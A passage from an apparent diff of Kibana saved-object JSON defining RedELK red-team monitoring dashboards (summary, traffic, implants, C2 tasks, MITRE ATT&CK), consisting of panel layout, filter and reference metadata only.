"a2dcebf0-d316-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "0b5ffcd0-d317-11ea-9301-a30a04251ae9", "name": "d4eb5dce-3894-4599-8c17-042fc067d58c:panel_d4eb5dce-3894-4599-8c17-042fc067d58c", "type": "visualization"}, {"id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "name": "1db7741d-210a-4331-b1cb-affc6ac1334e:panel_1db7741d-210a-4331-b1cb-affc6ac1334e", "type": "search"}, {"id": "389dddc0-d317-11ea-9301-a30a04251ae9", "name": "3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0:panel_3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0", "type": "visualization"}, {"id": "659280b0-d317-11ea-9301-a30a04251ae9", "name": "66403011-8fb6-402f-b9b6-5f503d6df704:panel_66403011-8fb6-402f-b9b6-5f503d6df704", "type": "visualization"}], "sort": [1642171876916, 97], "type": "dashboard", "version": "1"} \ No newline at end of file +{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"93f74516-7d73-4db3-8d64-589dfd7492b7\"},\"panelIndex\":\"93f74516-7d73-4db3-8d64-589dfd7492b7\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_93f74516-7d73-4db3-8d64-589dfd7492b7\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":48,\"h\":2,\"i\":\"66e33663-63c3-4e78-aa5d-725e33754c02\"},\"panelIndex\":\"66e33663-63c3-4e78-aa5d-725e33754c02\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_66e33663-63c3-4e78-aa5d-725e33754c02\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":4,\"w\":8,\"h\":9,\"i\":\"800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3\"},\"panelIndex\":\"800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":8,\"y\":4,\"w\":8,\"h\":9,\"i\":\"86117a55-669e-4d4d-a4d6-436da4f1a930\"},\"panelIndex\":\"86117a55-669e-4d4d-a4d6-436da4f1a930\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_86117a55-669e-4d4d-a4d6-436da4f1a930\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":16,\"y\":4,\"w\":8,\"h\":9,\"i\":\"ab07bed8-9d4e-409c-b3db-d15124eb5467\"},\"panelIndex\":\"ab07bed8-9d4e-409c-b3db-d15124eb5467\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_ab07bed8-9d4e-409c-b3db-d15124eb5467\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":4,\"w\":8,\"h\":9,\"i\":\"019655aa-c9de-444a-a4af-619b7297572b\"},\"panelIndex\":\"019655aa-c9de-444a-a4af-619b7297572b\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_019655aa-c9de-444a-a4af-619b7297572b\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":32,\"y\":4,\"w\":16,\"h\":9,\"i\":\"43a0761e-49bc-4846-9956-04a604b063ec\"},\"panelIndex\":\"43a0761e-49bc-4846-9956-04a604b063ec\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_43a0761e-49bc-4846-9956-04a604b063ec\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":13,\"w\":8,\"h\":9,\"i\":\"eab2038d-128a-4b5b-8a72-701fd3f53bd8\"},\"panelIndex\":\"eab2038d-128a-4b5b-8a72-701fd3f53bd8\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_eab2038d-128a-4b5b-8a72-701fd3f53bd8\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":8,\"y\":13,\"w\":8,\"h\":9,\"i\":\"e18544fe-ac30-43cf-891c-4448ffea6bbd\"},\"panelIndex\":\"e18544fe-ac30-43cf-891c-4448ffea6bbd\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_e18544fe-ac30-43cf-891c-4448ffea6bbd\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":16,\"y\":13,\"w\":16,\"h\":9,\"i\":\"6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d\"},\"panelIndex\":\"6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Compromised realms\",\"panelRefName\":\"panel_6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":32,\"y\":13,\"w\":8,\"h\":9,\"i\":\"223951c1-7fe0-40f9-9a89-0c91aedd7fce\"},\"panelIndex\":\"223951c1-7fe0-40f9-9a89-0c91aedd7fce\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_223951c1-7fe0-40f9-9a89-0c91aedd7fce\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":40,\"y\":13,\"w\":8,\"h\":9,\"i\":\"c15dc2cd-fad3-44a3-b127-1cd47d837740\"},\"panelIndex\":\"c15dc2cd-fad3-44a3-b127-1cd47d837740\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_c15dc2cd-fad3-44a3-b127-1cd47d837740\"}]", "refreshInterval": {"pause": true, "value": 0}, "timeFrom": "now-12M", "timeRestore": true, "timeTo": "now", "title": "RedELK - Summary dashboard", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "02486040-d355-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "93f74516-7d73-4db3-8d64-589dfd7492b7:panel_93f74516-7d73-4db3-8d64-589dfd7492b7", "type": "visualization"}, {"id": "45491770-0886-11eb-a2d2-171dc8941414", "name": "66e33663-63c3-4e78-aa5d-725e33754c02:panel_66e33663-63c3-4e78-aa5d-725e33754c02", "type": "visualization"}, {"id": "b19d4790-d35f-11ea-9301-a30a04251ae9", "name": "800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3:panel_800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3", "type": "visualization"}, {"id": "dcf86190-d319-11ea-9301-a30a04251ae9", "name": "86117a55-669e-4d4d-a4d6-436da4f1a930:panel_86117a55-669e-4d4d-a4d6-436da4f1a930", "type": "visualization"}, {"id": "b5beb3c0-d04b-11ea-9301-a30a04251ae9", "name": "ab07bed8-9d4e-409c-b3db-d15124eb5467:panel_ab07bed8-9d4e-409c-b3db-d15124eb5467", "type": "visualization"}, {"id": "389dddc0-d317-11ea-9301-a30a04251ae9", "name": "019655aa-c9de-444a-a4af-619b7297572b:panel_019655aa-c9de-444a-a4af-619b7297572b", "type": "visualization"}, {"id": "ce581930-d361-11ea-9301-a30a04251ae9", "name": "43a0761e-49bc-4846-9956-04a604b063ec:panel_43a0761e-49bc-4846-9956-04a604b063ec", "type": "visualization"}, {"id": "57626ad0-d355-11ea-9301-a30a04251ae9", "name": "eab2038d-128a-4b5b-8a72-701fd3f53bd8:panel_eab2038d-128a-4b5b-8a72-701fd3f53bd8", "type": "visualization"}, {"id": "464660c0-d360-11ea-9301-a30a04251ae9", "name": "e18544fe-ac30-43cf-891c-4448ffea6bbd:panel_e18544fe-ac30-43cf-891c-4448ffea6bbd", "type": "visualization"}, {"id": "ff4497f0-d319-11ea-9301-a30a04251ae9", "name": "6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d:panel_6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d", "type": "visualization"}, {"id": "62b61920-d4e2-11ea-9301-a30a04251ae9", "name": "223951c1-7fe0-40f9-9a89-0c91aedd7fce:panel_223951c1-7fe0-40f9-9a89-0c91aedd7fce", "type": "visualization"}, {"id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", "name": "c15dc2cd-fad3-44a3-b127-1cd47d837740:panel_c15dc2cd-fad3-44a3-b127-1cd47d837740", "type": "visualization"}], "sort": [1642152857910, 2054], "type": "dashboard", "version": "1"} +{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"9af964d0-b9c5-4fa0-81d7-6e7cf9657757\"},\"panelIndex\":\"9af964d0-b9c5-4fa0-81d7-6e7cf9657757\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_9af964d0-b9c5-4fa0-81d7-6e7cf9657757\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":6,\"i\":\"09cb7bd6-8162-4141-8a0c-807ee57a4603\"},\"panelIndex\":\"09cb7bd6-8162-4141-8a0c-807ee57a4603\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Target host(s) and user(s) filter\",\"panelRefName\":\"panel_09cb7bd6-8162-4141-8a0c-807ee57a4603\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":12,\"h\":6,\"i\":\"fcd3a5bc-91d9-46a2-b08c-92958c5b6089\"},\"panelIndex\":\"fcd3a5bc-91d9-46a2-b08c-92958c5b6089\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Implants per host\",\"panelRefName\":\"panel_fcd3a5bc-91d9-46a2-b08c-92958c5b6089\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":36,\"y\":2,\"w\":12,\"h\":6,\"i\":\"47710d04-18f9-4563-bf0d-73b4dc24f9e5\"},\"panelIndex\":\"47710d04-18f9-4563-bf0d-73b4dc24f9e5\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Implants per user\",\"panelRefName\":\"panel_47710d04-18f9-4563-bf0d-73b4dc24f9e5\"},{\"version\":\"7.10.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":8,\"w\":48,\"h\":51,\"i\":\"30674424-d470-4b93-80c1-260d16f987ab\"},\"panelIndex\":\"30674424-d470-4b93-80c1-260d16f987ab\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_30674424-d470-4b93-80c1-260d16f987ab\"}]", "timeRestore": false, "title": "RedELK - Red Team Operations", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "04b87c50-d028-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "9af964d0-b9c5-4fa0-81d7-6e7cf9657757:panel_9af964d0-b9c5-4fa0-81d7-6e7cf9657757", "type": "visualization"}, {"id": "d2c7b720-d026-11ea-9301-a30a04251ae9", "name": "09cb7bd6-8162-4141-8a0c-807ee57a4603:panel_09cb7bd6-8162-4141-8a0c-807ee57a4603", "type": "visualization"}, {"id": "632081a0-d02a-11ea-9301-a30a04251ae9", "name": "fcd3a5bc-91d9-46a2-b08c-92958c5b6089:panel_fcd3a5bc-91d9-46a2-b08c-92958c5b6089", "type": "visualization"}, {"id": "6fcf1e70-d02a-11ea-9301-a30a04251ae9", "name": "47710d04-18f9-4563-bf0d-73b4dc24f9e5:panel_47710d04-18f9-4563-bf0d-73b4dc24f9e5", "type": "visualization"}, {"id": "1c580960-b6a9-11e8-bc1a-cf8fa3255855", "name": "30674424-d470-4b93-80c1-260d16f987ab:panel_30674424-d470-4b93-80c1-260d16f987ab", "type": "search"}], "sort": [1642152857910, 2060], "type": "dashboard", "version": "1"} +{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"8f1a6a90-4b7e-47ef-aa74-a6037b7461e1\"},\"panelIndex\":\"8f1a6a90-4b7e-47ef-aa74-a6037b7461e1\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_8f1a6a90-4b7e-47ef-aa74-a6037b7461e1\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":9,\"i\":\"ecf77ead-e22f-4708-addf-0cbaaeb6fced\"},\"panelIndex\":\"ecf77ead-e22f-4708-addf-0cbaaeb6fced\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Techniques, Tactics and Procedures\",\"panelRefName\":\"panel_ecf77ead-e22f-4708-addf-0cbaaeb6fced\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":24,\"h\":18,\"i\":\"ff3f84bc-6c84-43fd-aa0f-19e5a91be826\"},\"panelIndex\":\"ff3f84bc-6c84-43fd-aa0f-19e5a91be826\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"C2 tasks per host and user\",\"panelRefName\":\"panel_ff3f84bc-6c84-43fd-aa0f-19e5a91be826\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":11,\"w\":24,\"h\":9,\"i\":\"23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e\"},\"panelIndex\":\"23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Cobalt Strike tasks per operator\",\"panelRefName\":\"panel_23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":20,\"w\":48,\"h\":14,\"i\":\"b038a84c-9db0-4266-af43-c8023da4781a\"},\"panelIndex\":\"b038a84c-9db0-4266-af43-c8023da4781a\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"C2 tasks\",\"panelRefName\":\"panel_b038a84c-9db0-4266-af43-c8023da4781a\"}]", "timeRestore": false, "title": "RedELK - Tasks", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "0523c8a0-d025-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "8f1a6a90-4b7e-47ef-aa74-a6037b7461e1:panel_8f1a6a90-4b7e-47ef-aa74-a6037b7461e1", "type": "visualization"}, {"id": "88db1280-d024-11ea-9301-a30a04251ae9", "name": "ecf77ead-e22f-4708-addf-0cbaaeb6fced:panel_ecf77ead-e22f-4708-addf-0cbaaeb6fced", "type": "visualization"}, {"id": "a5554e20-d025-11ea-9301-a30a04251ae9", "name": "ff3f84bc-6c84-43fd-aa0f-19e5a91be826:panel_ff3f84bc-6c84-43fd-aa0f-19e5a91be826", "type": "visualization"}, {"id": "afb6ce00-d022-11ea-9301-a30a04251ae9", "name": "23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e:panel_23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e", "type": "visualization"}, {"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "b038a84c-9db0-4266-af43-c8023da4781a:panel_b038a84c-9db0-4266-af43-c8023da4781a", "type": "search"}], "sort": [1642152857910, 2066], "type": "dashboard", "version": "1"} +{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":true,\"key\":\"tags\",\"negate\":false,\"params\":{\"query\":\"iplist_redteam\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"tags\":\"iplist_redteam\"}}},{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":true,\"key\":\"tags\",\"negate\":false,\"params\":{\"query\":\"iplist_customer\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index\"},\"query\":{\"match_phrase\":{\"tags\":\"iplist_customer\"}}}]}"}, "optionsJSON": "{\"darkTheme\":false,\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"h\":2,\"i\":\"948c1286-d4de-44a6-8fb2-95bf9252ed00\",\"w\":48,\"x\":0,\"y\":0},\"panelIndex\":\"948c1286-d4de-44a6-8fb2-95bf9252ed00\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_948c1286-d4de-44a6-8fb2-95bf9252ed00\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"h\":5,\"i\":\"ab9eb0fb-a164-4295-8177-865a2a67dccb\",\"w\":36,\"x\":0,\"y\":2},\"panelIndex\":\"ab9eb0fb-a164-4295-8177-865a2a67dccb\",\"embeddableConfig\":{\"hidePanelTitles\":false,\"enhancements\":{}},\"title\":\"Filters\",\"panelRefName\":\"panel_ab9eb0fb-a164-4295-8177-865a2a67dccb\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"h\":5,\"i\":\"c630a33e-6a98-466d-8223-fd83e6947b8c\",\"w\":12,\"x\":36,\"y\":2},\"panelIndex\":\"c630a33e-6a98-466d-8223-fd83e6947b8c\",\"embeddableConfig\":{\"hidePanelTitles\":false,\"enhancements\":{}},\"title\":\"HTTP Redir traffic per backend\",\"panelRefName\":\"panel_c630a33e-6a98-466d-8223-fd83e6947b8c\"},{\"version\":\"7.10.0\",\"type\":\"map\",\"gridData\":{\"h\":15,\"i\":\"1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a\",\"w\":24,\"x\":0,\"y\":7},\"panelIndex\":\"1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a\",\"embeddableConfig\":{\"hiddenLayers\":[],\"hidePanelTitles\":false,\"isLayerTOCOpen\":false,\"mapCenter\":{\"lat\":14.5701,\"lon\":121.0254,\"zoom\":17},\"openTOCDetails\":[],\"enhancements\":{}},\"title\":\"HTTP redir traffic map\",\"panelRefName\":\"panel_1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"h\":15,\"i\":\"fc254327-57ac-4e5f-88f7-a32d48570289\",\"w\":24,\"x\":24,\"y\":7},\"panelIndex\":\"fc254327-57ac-4e5f-88f7-a32d48570289\",\"embeddableConfig\":{\"hidePanelTitles\":false,\"enhancements\":{}},\"title\":\"HTTP Redir traffic over time\",\"panelRefName\":\"panel_fc254327-57ac-4e5f-88f7-a32d48570289\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"h\":15,\"i\":\"829f61cf-9374-4bb5-8214-34e6875e79da\",\"w\":24,\"x\":0,\"y\":22},\"panelIndex\":\"829f61cf-9374-4bb5-8214-34e6875e79da\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_829f61cf-9374-4bb5-8214-34e6875e79da\"},{\"version\":\"7.10.0\",\"type\":\"search\",\"gridData\":{\"h\":22,\"i\":\"0bc5f60b-f940-451a-886b-edff3512d180\",\"w\":48,\"x\":0,\"y\":37},\"panelIndex\":\"0bc5f60b-f940-451a-886b-edff3512d180\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_0bc5f60b-f940-451a-886b-edff3512d180\"}]", "refreshInterval": {"pause": false, "value": 30000}, "timeFrom": "now-1d", "timeRestore": true, "timeTo": "now", "title": "RedELK - Traffic dashboard", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "0f8626d0-c6f4-11e8-a9c6-cd307b96b1ba", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}, {"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern"}, {"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "948c1286-d4de-44a6-8fb2-95bf9252ed00:panel_948c1286-d4de-44a6-8fb2-95bf9252ed00", "type": "visualization"}, {"id": "56350050-efe7-11eb-8a9f-2572da287875", "name": "ab9eb0fb-a164-4295-8177-865a2a67dccb:panel_ab9eb0fb-a164-4295-8177-865a2a67dccb", "type": "visualization"}, {"id": "d625ba60-efe8-11eb-8a9f-2572da287875", "name": "c630a33e-6a98-466d-8223-fd83e6947b8c:panel_c630a33e-6a98-466d-8223-fd83e6947b8c", "type": "visualization"}, {"id": "dd9e9510-efec-11eb-8a9f-2572da287875", "name": "1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a:panel_1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a", "type": "map"}, {"id": "be08d380-efe9-11eb-8a9f-2572da287875", "name": "fc254327-57ac-4e5f-88f7-a32d48570289:panel_fc254327-57ac-4e5f-88f7-a32d48570289", "type": "visualization"}, {"id": "cbb7d710-efee-11eb-8a9f-2572da287875", "name": "829f61cf-9374-4bb5-8214-34e6875e79da:panel_829f61cf-9374-4bb5-8214-34e6875e79da", "type": "visualization"}, {"id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "name": "0bc5f60b-f940-451a-886b-edff3512d180:panel_0bc5f60b-f940-451a-886b-edff3512d180", "type": "search"}], "sort": [1642152857910, 2076], "type": "dashboard", "version": "1"} +{"attributes": {"description": "RedELK implants dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"filter\":[{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"tags\",\"params\":{\"query\":\"sandboxes_v01\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"tags\":\"sandboxes_v01\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"tags\",\"params\":{\"query\":\"testsystems_v01\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index\"},\"query\":{\"match_phrase\":{\"tags\":\"testsystems_v01\"}},\"$state\":{\"store\":\"appState\"}}]}"}, "optionsJSON": "{\"darkTheme\":false,\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":15,\"i\":\"1\"},\"panelIndex\":\"1\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_1\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":24,\"h\":15,\"i\":\"2\"},\"panelIndex\":\"2\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_2\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":17,\"w\":24,\"h\":15,\"i\":\"3\"},\"panelIndex\":\"3\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_3\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":32,\"w\":48,\"h\":22,\"i\":\"4\"},\"panelIndex\":\"4\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_4\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":17,\"w\":24,\"h\":15,\"i\":\"5\"},\"panelIndex\":\"5\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_5\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"a5e43e90-aa23-403a-9167-bfe8aff7fb6c\"},\"panelIndex\":\"a5e43e90-aa23-403a-9167-bfe8aff7fb6c\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_a5e43e90-aa23-403a-9167-bfe8aff7fb6c\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":54,\"w\":48,\"h\":19,\"i\":\"b9915fcd-f22e-4326-986a-25684f947b79\"},\"panelIndex\":\"b9915fcd-f22e-4326-986a-25684f947b79\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_b9915fcd-f22e-4326-986a-25684f947b79\"}]", "refreshInterval": {"pause": false, "value": 30000}, "timeFrom": "now-30d", "timeRestore": true, "timeTo": "now", "title": "RedELK - Implants dashboard", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "117dbba0-c6f5-11e8-a9c6-cd307b96b1ba", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern"}, {"id": "e12434d0-b8e8-11e8-94dd-171ae5c1fd1a", "name": "1:panel_1", "type": "visualization"}, {"id": "88003df0-b8ec-11e8-94dd-171ae5c1fd1a", "name": "2:panel_2", "type": "visualization"}, {"id": "10dcc4a0-b8e7-11e8-94dd-171ae5c1fd1a", "name": "3:panel_3", "type": "visualization"}, {"id": "f0dcbda0-b8e5-11e8-94dd-171ae5c1fd1a", "name": "4:panel_4", "type": "visualization"}, {"id": "a1efc620-b8e4-11e8-94dd-171ae5c1fd1a", "name": "5:panel_5", "type": "visualization"}, {"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "a5e43e90-aa23-403a-9167-bfe8aff7fb6c:panel_a5e43e90-aa23-403a-9167-bfe8aff7fb6c", "type": "visualization"}, {"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "b9915fcd-f22e-4326-986a-25684f947b79:panel_b9915fcd-f22e-4326-986a-25684f947b79", "type": "search"}], "sort": [1642152857910, 2086], "type": "dashboard", "version": "1"} +{"attributes": {"description": "MITRE ATT&CK dashboard showing TTPs used (SIEM detection must be configured first)", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":21,\"h\":17,\"i\":\"e4271670-160e-444d-bb78-46ae1e1c7339\"},\"panelIndex\":\"e4271670-160e-444d-bb78-46ae1e1c7339\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"MITRE ATT&CK Tactics\",\"panelRefName\":\"panel_e4271670-160e-444d-bb78-46ae1e1c7339\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":21,\"y\":2,\"w\":27,\"h\":17,\"i\":\"6b3738e3-3bd8-417f-866a-f7c990b0b6f8\"},\"panelIndex\":\"6b3738e3-3bd8-417f-866a-f7c990b0b6f8\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"MITRE ATT&CK Techniques\",\"panelRefName\":\"panel_6b3738e3-3bd8-417f-866a-f7c990b0b6f8\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":19,\"w\":24,\"h\":15,\"i\":\"de3ced26-2a55-43f5-af28-dc5c2b967c29\"},\"panelIndex\":\"de3ced26-2a55-43f5-af28-dc5c2b967c29\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_de3ced26-2a55-43f5-af28-dc5c2b967c29\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":19,\"w\":24,\"h\":15,\"i\":\"38e24827-8707-4583-805a-98e4138495a7\"},\"panelIndex\":\"38e24827-8707-4583-805a-98e4138495a7\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_38e24827-8707-4583-805a-98e4138495a7\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":34,\"w\":48,\"h\":15,\"i\":\"60dc249a-1ad0-456c-850b-95c77ea0bc18\"},\"panelIndex\":\"60dc249a-1ad0-456c-850b-95c77ea0bc18\",